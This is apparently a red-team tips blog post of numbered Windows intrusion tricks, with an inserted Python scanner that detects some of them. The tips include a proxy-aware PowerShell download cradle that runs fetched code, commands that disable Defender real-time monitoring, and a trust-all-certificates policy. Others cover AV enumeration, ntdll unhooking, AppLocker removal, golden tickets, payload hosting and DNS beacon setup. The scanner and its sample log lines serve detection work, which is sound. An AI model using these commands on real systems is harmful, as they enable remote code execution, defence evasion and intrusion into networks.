
Red Team Tips

#0: Need good blog posts/references? Consider XPN’s Blog and Vincent Yiu’s Red Team Tips

#1 The standard powershell download cradle (IEX (New-Object …)) is NOT proxy aware. A far superior alternative is the following one-liner:

$webclient=(New-Object Net.WebClient);$webclient.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $webclient.DownloadString("")

#2 Feeling like you hit a dead end in your enumeration? Consider SQL servers… They are often overlooked, and can easily be exploited for RCE (think potato exploits). NETSPI is an expert in DB exploitation. I highly recommend powerupsql if you can manage to load powershell undetected.

#3 The command to list AV products is

Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct


WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

#4 Only got CIFS TGS? you can still use sc to enable/disable/register new services on remote computers.

#5 The command to disable real-time monitoring is

Set-MpPreference -DisableRealtimeMonitoring $true

This is NOT opsec safe (duh).

#6 unhook ntdll.dll and all your AV problems go away 🙂
A good starting point is

#7 In my honest opinion, is superior to mimikatz itself for reading out dumps and registry keys. It’s Python based, so it works cross-OS. Pretty damn sweet.

#8. Don’t use SimpleHTTPServer anymore, use the much better UpDog instead (it has uploading functionalities!)

#9. Pwndrop is another nice alternative for quickly hosting payloads, and it has facade options to prevent snooping eyes.

#10. Need a powershell web server for some reason? use this one!
It has script execution, command execution, and download functionalities.

#11. You need quote escapes in powershell? There are a few different options: either use backslash (\) to escape quotes or use encodedcommands instead. Pro tip: chaining powershell commands can be done, even encoded, by just using “;” as a separator between commands, e.g. whoami;whoami /priv

#12. Ever in a restricted environment, or using a tool that needs an argument to spawn a new shell? Use .bat files or .cmd files like so (batch has no inline ## comments, so the note goes on its own rem line):

@echo off
rem or any other powershell command you need instead of the line below
powershell.exe -noexit

#13. powershell script to c#? no problem!

#14. need to get rid of applocker (after you bypassed it initially)?

#15. Using Costura to package your c#? @cobbr says “Be sure to install Costura v1.6.2 to work with .NET Framework v3.5 assemblies”

#16. @0gtweet tweeted an interesting thing: “an undocumented -encodedarguments PowerShell parameter. It may be shortened to ‘ea’ or ‘encodeda’.”

#17. @mpgn_x64 said: Struggling with golden ticket and access denied? Use ‘klist add_bind’ command after injecting your ticket with mimikatz or rubeus. (tweet)

#18. Ever needed to know what regkey is being edited by mdm or gpo? check this site:

#19. You’ll need local admin rights to change registry keys in HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\

#20. you can pass cmd args from explorer window, for example

#21 when using GadgetToJScript, use x86 payloads! Also, specifying the assembly is easier than compiling the CSharp, as it imports the correct DLLs automagically

#22 powershell version 2 but having annoying SSL errors?

# 3072 is SecurityProtocolType.Tls12; the number is used because the older .NET enum shipped with powershell v2 has no Tls12 name
[Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072)

# Certificate policy that accepts every certificate, valid or not: this turns off certificate validation for the whole process
add-type @"
    using System.Net;
    using System.Security.Cryptography.X509Certificates;
    public class TrustAllCertsPolicy : ICertificatePolicy {
        public bool CheckValidationResult(
            ServicePoint srvPoint, X509Certificate certificate,
            WebRequest request, int certificateProblem) {
            return true;
        }
    }
"@
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
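From the blue side, the one-liners in tips #1, #5, #16 and #22 all leave very recognisable command lines. The scanner below is an added example (not code from the original post): it runs a few rules over constructed process-creation CommandLine samples, and the base64-shape check it applies to -ea is my own assumption to keep the ordinary -ErrorAction alias from firing.

```python
"""Flag PowerShell command lines that match tips #1, #5, #16 and #22.
Added example, not from the original post; the sample log lines are constructed."""
import re

ERROR_ACTION_VALUES = {"silentlycontinue", "stop", "continue", "inquire",  # -ea on a cmdlet = -ErrorAction
                       "ignore", "suspend", "break"}
B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

RULES = {
    # Tip #1: WebClient.DownloadString handed to IEX (proxy-aware cradle included)
    "download_cradle": re.compile(r"downloadstring.*\biex\b|\biex\b.*downloadstring", re.I),
    # Tip #1: the cradle borrows the logged-on user's proxy credentials
    "proxy_cred_reuse": re.compile(r"defaultnetworkcredentials", re.I),
    # Tip #5: Defender real-time monitoring switched off
    "defender_rtm_off": re.compile(r"set-mppreference.*-disablerealtimemonitoring\s+\$?true", re.I),
    # Tip #22: process-wide certificate validation bypass
    "cert_check_off": re.compile(r"icertificatepolicy|servicepointmanager\]::certificatepolicy", re.I),
}
ENCODED_ARGS = re.compile(r"(?:^|\s)-(?:encodedarguments|encodeda|ea)\s+(\S+)", re.I)

def has_encoded_arguments(cmdline):
    """Tip #16: -ea on powershell.exe is the undocumented -encodedarguments.
    Only a base64-looking value counts, so '-ea SilentlyContinue' stays quiet (assumption)."""
    for value in ENCODED_ARGS.findall(cmdline):
        value = value.strip("\"'")
        if value.lower() in ERROR_ACTION_VALUES:
            continue
        if len(value) >= 16 and len(value) % 4 == 0 and B64.match(value):
            return True
    return False

def scan(cmdline):
    """Return the sorted rule names one command line triggers ([] if clean)."""
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    if has_encoded_arguments(cmdline):
        hits.append("encoded_args")
    return sorted(hits)

SAMPLE_LOG = [  # constructed samples; the URL is a placeholder
    "powershell.exe -nop -w hidden -c \"$w=(New-Object Net.WebClient);$w.Proxy.Credentials="
    "[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString('http://example.invalid/a.ps1')\"",
    "powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true",
    "powershell.exe -ea VwByAGkAdABlAC0ASABvAHMAdAAgAGgAaQA=",  # UTF-16LE 'Write-Host hi'
    "powershell.exe -Command \"[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\"",
    "powershell.exe -Command \"Get-Process notepad -ea SilentlyContinue\"",  # benign -ErrorAction use
]

for line in SAMPLE_LOG:
    print(scan(line) or "clean", "<-", line[:70])
```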

#23 want to enum rdp sessions? use the qwinsta command

#24 want a nice overview of outdated operating systems when you have a bloodhound dump? use the neo4j web application and run this query:

MATCH (H:Computer) WHERE H.operatingsystem =~ '(?i).*indows.*(2000|2003|2008|7|xp|vista|me).*' AND H.enabled = true RETURN H.name, H.operatingsystem

#25 when configuring a DNS beacon, do not point the NS record to the IP, create an A record first, point the A record to the IP, then point the NS record to the A record.

#26 if you install another AV on a machine that has MDE installed, it will turn itself off, but the health will remain Active. ¯\_(ツ)_/¯ Could be interesting in a red team edge case I guess. Tip provided by @0xThiebaut

#27 wanna know which logon types generate creds that can be reused on target? (avoid double hop):